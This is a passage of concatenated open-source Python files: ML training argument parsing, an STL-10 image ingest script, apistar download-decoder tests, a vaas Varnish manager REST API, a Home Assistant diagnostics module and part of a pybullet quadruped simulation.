# its a list of integers or strings
try:
# convert to int
value = [int(v) for v in value]
except:
# pass because its a string
pass
else:
try:
if value.lower() == "true": # check for boolean
value = True
elif value.lower() == "false":
value = False
else:
desired_type = type(value_namespace)
value = desired_type(value)
except ValueError as e:
logger.warning(
"Type mismatch while over-riding. Skipping key: {}".format(
key
)
)
continue
override_dict[key] = value
setattr(namespace, "override_args", override_dict)
else:
setattr(namespace, "override_args", None)
def arguments_common(parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="Common arguments", description="Common arguments"
)
group.add_argument("--common.seed", type=int, default=0, help="Random seed")
group.add_argument(
"--common.config-file", type=str, default=None, help="Configuration file"
)
group.add_argument(
"--common.results-loc",
type=str,
default="results",
help="Directory where results will be stored",
)
group.add_argument(
"--common.run-label",
type=str,
default="run_1",
help="Label id for the current run",
)
group.add_argument(
"--common.resume", type=str, default=None, help="Resume location"
)
group.add_argument(
"--common.finetune_imagenet1k",
type=str,
default=None,
help="Checkpoint location to be used for finetuning",
)
group.add_argument(
"--common.finetune_imagenet1k-ema",
type=str,
default=None,
help="EMA Checkpoint location to be used for finetuning",
)
group.add_argument(
"--common.mixed-precision", action="store_true", help="Mixed precision training"
)
group.add_argument(
"--common.accum-freq",
type=int,
default=1,
help="Accumulate gradients for this number of iterations",
)
group.add_argument(
"--common.accum-after-epoch",
type=int,
default=0,
help="Start accumulation after this many epochs",
)
group.add_argument(
"--common.log-freq",
type=int,
default=100,
help="Display after these many iterations",
)
group.add_argument(
"--common.auto-resume",
action="store_true",
help="Resume training from the last checkpoint",
)
group.add_argument(
"--common.grad-clip", type=float, default=None, help="Gradient clipping value"
)
group.add_argument(
"--common.k-best-checkpoints",
type=int,
default=5,
help="Keep k-best checkpoints",
)
group.add_argument(
"--common.inference-modality",
type=str,
default="image",
choices=SUPPORTED_MODALITIES,
help="Inference modality. Image or videos",
)
group.add_argument(
"--common.channels-last",
action="store_true",
default=False,
help="Use channel last format during training. "
"Note 1: that some models may not support it, so we recommend to use it with caution"
"Note 2: Channel last format does not work with 1-, 2-, and 3- tensors. "
"Therefore, we support it via custom collate functions",
)
group.add_argument(
"--common.tensorboard-logging",
action="store_true",
help="Enable tensorboard logging",
)
group.add_argument(
"--common.bolt-logging", action="store_true", help="Enable bolt logging"
)
group.add_argument(
"--common.override-kwargs",
nargs="*",
action=ParseKwargs,
help="Override arguments. Example. To override the value of --sampler.vbs.crop-size-width, "
"we can pass override argument as "
"--common.override-kwargs sampler.vbs.crop_size_width=512 \n "
"Note that keys in override arguments do not contain -- or -",
)
group.add_argument(
"--common.enable-coreml-compatible-module",
action="store_true",
help="Use coreml compatible modules (if applicable) during inference",
)
group.add_argument(
"--common.debug-mode",
action="store_true",
help="You can use this flag for debugging purposes.",
)
return parser
def arguments_ddp(parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="DDP arguments", description="DDP arguments"
)
group.add_argument("--ddp.disable", action="store_true", help="Don't use DDP")
group.add_argument(
"--ddp.rank", type=int, default=0, help="Node rank for distributed training"
)
group.add_argument(
"--ddp.world-size", type=int, default=-1, help="World size for DDP"
)
group.add_argument("--ddp.dist-url", type=str, default=None, help="DDP URL")
group.add_argument(
"--ddp.dist-port",
type=int,
default=30786,
help="DDP Port. Only used when --ddp.dist-url is not specified",
)
group.add_argument("--ddp.device-id", type=int, default=None, help="Device ID")
group.add_argument(
"--ddp.no-spawn", action="store_true", help="Don't use DDP with spawn"
)
group.add_argument(
"--ddp.backend", type=str, default="nccl", help="DDP backend. Default is nccl"
)
group.add_argument(
"--ddp.find-unused-params",
action="store_true",
help="Find unused params in model. useful for debugging with DDP",
)
return parser
def get_training_arguments(parse_args: Optional[bool] = True):
parser = argparse.ArgumentParser(description="Training arguments", add_help=True)
# sampler related arguments
parser = arguments_sampler(parser=parser)
# dataset related arguments
parser = arguments_dataset(parser=parser)
# anchor generator arguments
parser = arguments_anchor_gen(parser=parser)
# arguments related to box matcher
parser = arguments_box_matcher(parser=parser)
# Video reader related arguments
parser = arguments_video_reader(parser=parser)
# collate fn related arguments
parser = arguments_collate_fn(parser=parser)
# transform related arguments
parser = arguments_augmentation(parser=parser)
# model related arguments
parser = arguments_nn_layers(parser=parser)
parser = arguments_model(parser=parser)
parser = arguments_ema(parser=parser)
# loss function arguments
parser = arguments_loss_fn(parser=parser)
# optimizer arguments
parser = arguments_optimizer(parser=parser)
parser = arguments_scheduler(parser=parser)
# DDP arguments
parser = arguments_ddp(parser=parser)
# stats arguments
parser = arguments_stats(parser=parser)
# common
parser = arguments_common(parser=parser)
if parse_args:
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
else:
return parser
def get_eval_arguments(parse_args=True):
return get_training_arguments(parse_args=parse_args)
def get_conversion_arguments():
parser = get_training_arguments(parse_args=False)
# Arguments related to coreml conversion
group = parser.add_argument_group("Conversion arguments")
group.add_argument(
"--conversion.coreml-extn",
type=str,
default="mlmodel",
help="Extension for converted model. Default is mlmodel",
)
group.add_argument(
"--conversion.input-image-path",
type=str,
default=None,
help="Path of the image to be used for conversion",
)
# Arguments related to server.
group.add_argument(
"--conversion.bucket-name", type=str, help="Model job's bucket name"
)
group.add_argument("--conversion.task-id", type=str, help="Model job's id")
group.add_argument(
"--conversion.viewers",
type=str,
nargs="+",
default=None,
help="Users who can view your models on server",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_bencmarking_arguments():
parser = get_training_arguments(parse_args=False)
#
group = parser.add_argument_group("Benchmarking arguments")
group.add_argument(
"--benchmark.batch-size",
type=int,
default=1,
help="Batch size for benchmarking",
)
group.add_argument(
"--benchmark.warmup-iter", type=int, default=10, help="Warm-up iterations"
)
group.add_argument(
"--benchmark.n-iter",
type=int,
default=100,
help="Number of iterations for benchmarking",
)
group.add_argument(
"--benchmark.use-jit-model",
action="store_true",
help="Convert the model to JIT and then benchmark it",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_segmentation_eval_arguments():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Segmentation evaluation related arguments")
group.add_argument(
"--evaluation.segmentation.apply-color-map",
action="store_true",
help="Apply color map to different classes in segmentation masks. Useful in visualization "
"+ some competitions (e.g, PASCAL VOC) accept submissions with colored segmentation masks",
)
group.add_argument(
"--evaluation.segmentation.save-overlay-rgb-pred",
action="store_true",
help="enable this flag to visualize predicted masks on top of input image",
)
group.add_argument(
"--evaluation.segmentation.save-masks",
action="store_true",
help="save predicted masks without colormaps. Useful for submitting to "
"competitions like Cityscapes",
)
group.add_argument(
"--evaluation.segmentation.overlay-mask-weight",
default=0.5,
type=float,
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.segmentation.mode",
type=str,
default="validation_set",
required=False,
choices=["single_image", "image_folder", "validation_set"],
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.segmentation.path",
type=str,
default=None,
help="Path of the image or image folder (only required for single_image and image_folder modes)",
)
group.add_argument(
"--evaluation.segmentation.num-classes",
type=str,
default=None,
help="Number of segmentation classes used during training",
)
group.add_argument(
"--evaluation.segmentation.resize-input-images",
action="store_true",
help="Resize input images",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_detection_eval_arguments():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Detection evaluation related arguments")
group.add_argument(
"--evaluation.detection.save-overlay-boxes",
action="store_true",
help="enable this flag to visualize predicted masks on top of input image",
)
group.add_argument(
"--evaluation.detection.mode",
type=str,
default="validation_set",
required=False,
choices=["single_image", "image_folder", "validation_set"],
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.detection.path",
type=str,
default=None,
help="Path of the image or image folder (only required for single_image and image_folder modes)",
)
group.add_argument(
"--evaluation.detection.num-classes",
type=str,
default=None,
help="Number of segmentation classes used during training",
)
group.add_argument(
"--evaluation.detection.resize-input-images",
action="store_true",
default=False,
help="Resize the input images",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_loss_landscape_args():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Loss landscape related arguments")
group.add_argument(
"--loss-landscape.n-points",
type=int,
default=11,
help="No. of grid points. Default is 11, so we have 11x11 grid",
)
group.add_argument(
"--loss-landscape.min-x",
type=float,
default=-1.0,
help="Min. value along x-axis",
)
group.add_argument(
"--loss-landscape.max-x",
type=float,
default=1.0,
help="Max. value along x-axis",
)
group.add_argument(
"--loss-landscape.min-y",
type=float,
default=-1.0,
help="Min. value along y-axis",
)
group.add_argument(
"--loss-landscape.max-y",
type=float,
default=1.0,
help="Max. value along y-axis",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
|
ArtGAN/data/ingest_stl10.py | rh01/caffe-model-for-category-artgan | 304 | 29815 | from configargparse import ArgParser
from PIL import Image
import logging
import numpy as np
import os
def transform_and_save(img_arr, output_filename):
"""
Takes an image and optionally transforms it and then writes it out to output_filename
"""
img = Image.fromarray(img_arr)
img.save(output_filename)
class Ingest(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
for setn in ('train', 'val'):
self.manifests[setn] = os.path.join(self.out_dir, '{}-index.csv'.format(setn))
self.target_size = target_size
self.trainpairlist = {}
self.valpairlist = {}
self.labels = range(10)
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
os.mkdir(os.path.join(self.outimgdir, 'train'))
os.mkdir(os.path.join(self.outimgdir, 'val'))
self.outlabeldir = os.path.join(self.out_dir, 'labels')
if not os.path.exists(self.outlabeldir):
os.mkdir(self.outlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'train_X.bin')
train_y_path = os.path.join(self.input_dir, 'train_y.bin')
test_x_path = os.path.join(self.input_dir, 'test_X.bin')
test_y_path = os.path.join(self.input_dir, 'test_y.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
train_yf = open(train_y_path, 'rb')
train_y = np.fromfile(train_yf, dtype=np.uint8)
test_xf = open(test_x_path, 'rb')
test_x = np.fromfile(test_xf, dtype=np.uint8)
test_x = np.reshape(test_x, (-1, 3, 96, 96))
test_x = np.transpose(test_x, (0, 3, 2, 1))
test_yf = open(test_y_path, 'rb')
test_y = np.fromfile(test_yf, dtype=np.uint8)
idx = np.zeros(10, dtype=np.int)
for i in xrange(train_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'train', str(train_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(outdir, str(idx[train_y[i]-1]) + '.jpg'))
self.trainpairlist[os.path.join('images', 'train', str(train_y[i]-1), str(idx[train_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(train_y[i] - 1) + '.txt')
idx[train_y[i]-1] += 1
idx = np.zeros(10, dtype=np.int)
for i in xrange(test_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'val', str(test_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=test_x[i],
output_filename=os.path.join(outdir, str(idx[test_y[i]-1]) + '.jpg'))
self.valpairlist[os.path.join('images', 'val', str(test_y[i]-1), str(idx[test_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(test_y[i] - 1) + '.txt')
idx[test_y[i]-1] += 1
print 'Finished Collect Data...'
def write_label(self, ):
for i, l in enumerate(self.labels):
sdir = os.path.join(self.outlabeldir, str(i) + '.txt')
np.savetxt(sdir, [l], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests['train'], records, fmt='%s,%s')
records = [(fname, tgt)
for fname, tgt in self.valpairlist.items()]
np.savetxt(self.manifests['val'], records, fmt='%s,%s')
class IngestUnlabeled(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
self.manifests = os.path.join(self.out_dir, 'unlabeled-index.csv')
self.target_size = target_size
self.trainpairlist = {}
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
self.unlabeldir = os.path.join(self.outimgdir, 'unlabeled')
if not os.path.exists(self.unlabeldir):
os.mkdir(self.unlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'unlabeled_X.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
idx = 0
for i in xrange(train_x.shape[0]):
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(self.unlabeldir, str(idx) + '.jpg'))
self.trainpairlist[os.path.join('images', 'unlabeled', str(idx) + '.jpg')] = 'labels/11.txt'
idx += 1
print 'Finished Collect Data...'
def write_label(self, ):
sdir = os.path.join(self.out_dir, 'labels', '11.txt')
np.savetxt(sdir, [11], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests, records, fmt='%s,%s')
if __name__ == "__main__":
parser = ArgParser()
parser.add_argument('--input_dir', help='Directory to find input',
default='/hdd/Dataset/STL10')
parser.add_argument('--out_dir', help='Directory to write ingested files',
default='/home/william/PyProjects/TFcodes/dataset/stl10')
parser.add_argument('--target_size', type=int, default=96,
help='Size in pixels to scale shortest side DOWN to (0 means no scaling)')
parser.add_argument('--skipImg', type=bool, default=False,
help='True to skip processing and copying images')
args = parser.parse_args()
logger = logging.getLogger(__name__)
bw = Ingest(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
# bw = IngestUnlabeled(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
bw.run()
|
tests/client/test_decoders.py | timgates42/apistar | 4,284 | 29825 | import os
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse, Response
from starlette.testclient import TestClient
from apistar.client import Client, decoders
app = Starlette()
@app.route("/text-response/")
def text_response(request):
return PlainTextResponse("hello, world")
@app.route("/file-response/")
def file_response(request):
headers = {
"Content-Type": "image/png",
"Content-Disposition": 'attachment; filename="filename.png"',
}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-url-filename/name.png")
def file_response_url_filename(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-no-extension/name")
def file_response_no_extension(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/")
def file_response_no_name(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
schema = {
"openapi": "3.0.0",
"info": {"title": "Test API", "version": "1.0"},
"servers": [{"url": "http://testserver"}],
"paths": {
"/text-response/": {"get": {"operationId": "text-response"}},
"/file-response/": {"get": {"operationId": "file-response"}},
"/file-response-url-filename/name.png": {
"get": {"operationId": "file-response-url-filename"}
},
"/file-response-no-extension/name": {
"get": {"operationId": "file-response-no-extension"}
},
"/": {"get": {"operationId": "file-response-no-name"}},
},
}
def test_text_response():
client = Client(schema, session=TestClient(app))
data = client.request("text-response")
assert data == "hello, world"
def test_file_response():
client = Client(schema, session=TestClient(app))
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
def test_file_response_url_filename():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-url-filename")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_extension():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-extension")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_name():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-name")
assert os.path.basename(data.name) == "download.png"
assert data.read() == b"<somedata>"
def test_unique_filename(tmpdir):
client = Client(
schema, session=TestClient(app), decoders=[decoders.DownloadDecoder(tmpdir)]
)
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
data = client.request("file-response")
assert os.path.basename(data.name) == "filename (1).png"
assert data.read() == b"<somedata>"
|
vaas-app/src/vaas/manager/api.py | allegro/vaas | 251 | 29849 | <filename>vaas-app/src/vaas/manager/api.py
# -*- coding: utf-8 -*-
import logging
from celery.result import AsyncResult
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS, Resource
from tastypie import fields
from tastypie.fields import ListField
from tastypie.authentication import ApiKeyAuthentication, MultiAuthentication, SessionAuthentication
from vaas.external.api import ExtendedDjangoAuthorization as DjangoAuthorization
from vaas.external.tasty_validation import ModelCleanedDataFormValidation
from vaas.external.serializer import PrettyJSONSerializer
from vaas.cluster.api import DcResource
from vaas.manager.forms import ProbeModelForm, DirectorModelForm, BackendModelForm, TimeProfileModelForm
from vaas.manager.models import Backend, Probe, Director, TimeProfile, ReloadTask
from vaas.monitor.models import BackendStatus
from vaas.external.oauth import VaasMultiAuthentication
logger = logging.getLogger('vaas')
class TimeProfileResource(ModelResource):
class Meta:
queryset = TimeProfile.objects.all()
resource_name = 'time_profile'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=TimeProfileModelForm)
always_return_data = True
filtering = {
'max_connections': ['exact'],
'connect_timeout': ['exact'],
'first_byte_timeout': ['exact'],
'between_bytes_timeout': ['exact']
}
class ProbeResource(ModelResource):
class Meta:
queryset = Probe.objects.all()
resource_name = 'probe'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=ProbeModelForm)
always_return_data = True
filtering = {
'name': ['exact'],
'url': ['exact'],
'expected_response': ['exact']
}
class DirectorResource(ModelResource):
probe = fields.ForeignKey(ProbeResource, 'probe', full=True)
time_profile = fields.ForeignKey(TimeProfileResource, 'time_profile', full=True)
backends = fields.ToManyField(
'vaas.manager.api.BackendResource', 'backends', null=True
)
cluster = fields.ToManyField(
'vaas.cluster.api.LogicalClusterResource', 'cluster', null=True, full=True
)
class Meta:
queryset = Director.objects.all()
resource_name = 'director'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication(), SessionAuthentication())
validation = ModelCleanedDataFormValidation(form_class=DirectorModelForm)
always_return_data = True
filtering = {
'name': ['exact'],
'enabled': ['exact'],
'probe': ALL_WITH_RELATIONS,
'cluster': ALL_WITH_RELATIONS,
'service': ['exact'],
'virtual': ['exact'],
'service_tag': ['exact'],
'reachable_via_service_mesh': ['exact'],
}
def save_m2m(self, bundle):
try:
new_uris = bundle.obj.new_clusters_uris
bundle.obj.new_clusters = [cluster.obj for cluster in bundle.data['cluster']
if cluster.data['resource_uri'] in new_uris]
logger.info("[DirectorResource.save_m2m()] new_clusters = %s", bundle.obj.new_clusters)
except (AttributeError, KeyError):
pass
return super(DirectorResource, self).save_m2m(bundle)
def update_in_place(self, request, original_bundle, new_data):
try:
original_bundle.obj.old_clusters = list(original_bundle.obj.cluster.all())
except AttributeError:
original_bundle.obj.old_clusters = []
logger.info("[DirectorResource.update_in_place()] old_clusters = %s", original_bundle.obj.old_clusters)
try:
original_bundle.obj.new_clusters_uris = new_data['cluster']
except KeyError:
original_bundle.obj.new_clusters_uris = []
original_bundle.obj.new_data = new_data
return super(DirectorResource, self).update_in_place(request, original_bundle, new_data)
class BackendResource(ModelResource):
dc = fields.ForeignKey(DcResource, 'dc', full=True)
director = fields.ForeignKey(DirectorResource, 'director')
tags = ListField()
class Meta:
queryset = Backend.objects.all()
resource_name = 'backend'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=BackendModelForm)
always_return_data = True
filtering = {
'dc': ALL_WITH_RELATIONS,
'director': ALL_WITH_RELATIONS,
'address': ['exact'],
'port': ['exact']
}
def dehydrate(self, bundle):
status = BackendStatus.objects.filter(address=bundle.data['address'],
port=bundle.data['port'])
if len(status) > 0:
bundle.data['status'] = status[0].status
else:
bundle.data['status'] = "Unknown"
bundle.data['time_profile'] = {
'max_connections': bundle.obj.director.time_profile.max_connections,
'connect_timeout': bundle.obj.director.time_profile.connect_timeout,
'first_byte_timeout': bundle.obj.director.time_profile.first_byte_timeout,
'between_bytes_timeout': bundle.obj.director.time_profile.between_bytes_timeout
}
return bundle
def build_filters(self, filters=None, ignore_bad_filters=False):
if filters is None:
filters = {}
orm_filters = super(BackendResource, self).build_filters(filters, ignore_bad_filters=ignore_bad_filters)
if 'tag' in filters:
orm_filters['tags__name__in'] = filters['tag'].split(',')
return orm_filters
def dehydrate_tags(self, bundle):
return list(map(str, bundle.obj.tags.all()))
def hydrate_tags(self, bundle):
if isinstance(bundle.data.get('tags'), list):
bundle.data['tags'] = ','.join(bundle.data['tags'])
elif bundle.data.get('tags') is None:
bundle.data['tags'] = ''
return bundle
def save_m2m(self, bundle):
tags = bundle.data.get('tags', [])
bundle.obj.tags.set(*tags)
return super(BackendResource, self).save_m2m(bundle)
class ReloadTaskResource(Resource):
status = fields.CharField(attribute='status')
info = fields.CharField(attribute='info')
class Meta:
resource_name = 'task'
list_allowed_methods = ['get']
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
fields = ['status', 'info']
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
task = AsyncResult(kwargs['pk'])
return ReloadTask(kwargs['pk'], task.status, '{}'.format(task.info))
def get_object_list(self, request):
return None
|
homeassistant/components/launch_library/diagnostics.py | MrDelik/core | 30,023 | 29874 | """Diagnostics support for Launch Library."""
from __future__ import annotations
from typing import Any
from pylaunches.objects.event import Event
from pylaunches.objects.launch import Launch
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import LaunchLibraryData
from .const import DOMAIN
async def async_get_config_entry_diagnostics(
hass: HomeAssistant,
entry: ConfigEntry,
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: DataUpdateCoordinator[LaunchLibraryData] = hass.data[DOMAIN]
if coordinator.data is None:
return {}
def _first_element(data: list[Launch | Event]) -> dict[str, Any] | None:
if not data:
return None
return data[0].raw_data_contents
return {
"next_launch": _first_element(coordinator.data["upcoming_launches"]),
"starship_launch": _first_element(
coordinator.data["starship_events"].upcoming.launches
),
"starship_event": _first_element(
coordinator.data["starship_events"].upcoming.events
),
}
|
examples/pybullet/examples/quadruped.py | felipeek/bullet3 | 9,136 | 29881 | <filename>examples/pybullet/examples/quadruped.py
import pybullet as p
import time
import math
import pybullet_data
def drawInertiaBox(parentUid, parentLinkIndex, color):
dyn = p.getDynamicsInfo(parentUid, parentLinkIndex)
mass = dyn[0]
frictionCoeff = dyn[1]
inertia = dyn[2]
if (mass > 0):
Ixx = inertia[0]
Iyy = inertia[1]
Izz = inertia[2]
boxScaleX = 0.5 * math.sqrt(6 * (Izz + Iyy - Ixx) / mass)
boxScaleY = 0.5 * math.sqrt(6 * (Izz + Ixx - Iyy) / mass)
boxScaleZ = 0.5 * math.sqrt(6 * (Ixx + Iyy - Izz) / mass)
halfExtents = [boxScaleX, boxScaleY, boxScaleZ]
pts = [[halfExtents[0], halfExtents[1], halfExtents[2]],
[-halfExtents[0], halfExtents[1], halfExtents[2]],
[halfExtents[0], -halfExtents[1], halfExtents[2]],
[-halfExtents[0], -halfExtents[1], halfExtents[2]],
[halfExtents[0], halfExtents[1], -halfExtents[2]],
[-halfExtents[0], halfExtents[1], -halfExtents[2]],
[halfExtents[0], -halfExtents[1], -halfExtents[2]],
[-halfExtents[0], -halfExtents[1], -halfExtents[2]]]
p.addUserDebugLine(pts[0],
pts[1],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[1],
pts[3],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[3],
pts[2],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[2],
pts[0],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[0],
pts[4],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[1],
pts[5],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[2],
pts[6],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[3],
pts[7],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[4 + 0],
pts[4 + 1],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[4 + 1],
pts[4 + 3],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[4 + 3],
pts[4 + 2],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
p.addUserDebugLine(pts[4 + 2],
pts[4 + 0],
color,
1,
parentObjectUniqueId=parentUid,
parentLinkIndex=parentLinkIndex)
toeConstraint = True
useMaximalCoordinates = False
useRealTime = 0
#the fixedTimeStep and numSolverIterations are the most important parameters to trade-off quality versus performance
fixedTimeStep = 1. / 100
numSolverIterations = 50
if (useMaximalCoordinates):
fixedTimeStep = 1. / 500
numSolverIterations = 200
speed = 10
amplitude = 0.8
jump_amp = 0.5
maxForce = 3.5
kneeFrictionForce = 0
kp = 1
kd = .5
maxKneeForce = 1000
physId = p.connect(p.SHARED_MEMORY_GUI)
if (physId < 0):
p.connect(p.GUI)
#p.resetSimulation()
p.setAdditionalSearchPath(pybullet_data.getDataPath())
angle = 0 # pick in range 0..0.2 radians
orn = p.getQuaternionFromEuler([0, angle, 0])
p.loadURDF("plane.urdf", [0, 0, 0], orn)
p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)
p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT,
"genericlogdata.bin",
maxLogDof=16,
logFlags=p.STATE_LOG_JOINT_TORQUES)
p.setTimeOut(4000000)
p.setGravity(0, 0, 0)
p.setTimeStep(fixedTimeStep)
orn = p.getQuaternionFromEuler([0, 0, 0.4])
p.setRealTimeSimulation(0)
quadruped = p.loadURDF("quadruped/minitaur_v1.urdf", [1, -1, .3],
orn,
useFixedBase=False,
useMaximalCoordinates=useMaximalCoordinates,
flags=p.URDF_USE_IMPLICIT_CYLINDER)
nJoints = p.getNumJoints(quadruped)
jointNameToId = {}
for i in range(nJoints):
jointInfo = p.getJointInfo(quadruped, i)
jointNameToId[jointInfo[1].decode('UTF-8')] = jointInfo[0]
motor_front_rightR_joint = jointNameToId['motor_front_rightR_joint']
motor_front_rightL_joint = jointNameToId['motor_front_rightL_joint']
knee_front_rightL_link = jointNameToId['knee_front_rightL_link']
hip_front_rightR_link = jointNameToId['hip_front_rightR_link']
knee_front_rightR_link = jointNameToId['knee_front_rightR_link']
motor_front_rightL_link = jointNameToId['motor_front_rightL_link']
motor_front_leftR_joint = jointNameToId['motor_front_leftR_joint']
hip_front_leftR_link = jointNameToId['hip_front_leftR_link']
knee_front_leftR_link = jointNameToId['knee_front_leftR_link']
motor_front_leftL_joint = jointNameToId['motor_front_leftL_joint']
motor_front_leftL_link = jointNameToId['motor_front_leftL_link']
knee_front_leftL_link = jointNameToId['knee_front_leftL_link']
motor_back_rightR_joint = jointNameToId['motor_back_rightR_joint']
hip_rightR_link = jointNameToId['hip_rightR_link']
knee_back_rightR_link = jointNameToId['knee_back_rightR_link']
motor_back_rightL_joint = jointNameToId['motor_back_rightL_joint']
motor_back_rightL_link = jointNameToId['motor_back_rightL_link']
knee_back_rightL_link = jointNameToId['knee_back_rightL_link']
motor_back_leftR_joint = jointNameToId['motor_back_leftR_joint']
hip_leftR_link = jointNameToId['hip_leftR_link']
knee_back_leftR_link = jointNameToId['knee_back_leftR_link']
motor_back_leftL_joint = jointNameToId['motor_back_leftL_joint']
motor_back_leftL_link = jointNameToId['motor_back_leftL_link']
knee_back_leftL_link = jointNameToId['knee_back_leftL_link']
#fixtorso = p.createConstraint(-1,-1,quadruped,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0,0])
motordir = [-1, -1, -1, -1, 1, 1, 1, 1]
halfpi = 1.57079632679
twopi = 4 * halfpi
kneeangle = -2.1834
dyn = p.getDynamicsInfo(quadruped, -1)
mass = dyn[0]
friction = dyn[1]
localInertiaDiagonal = dyn[2]
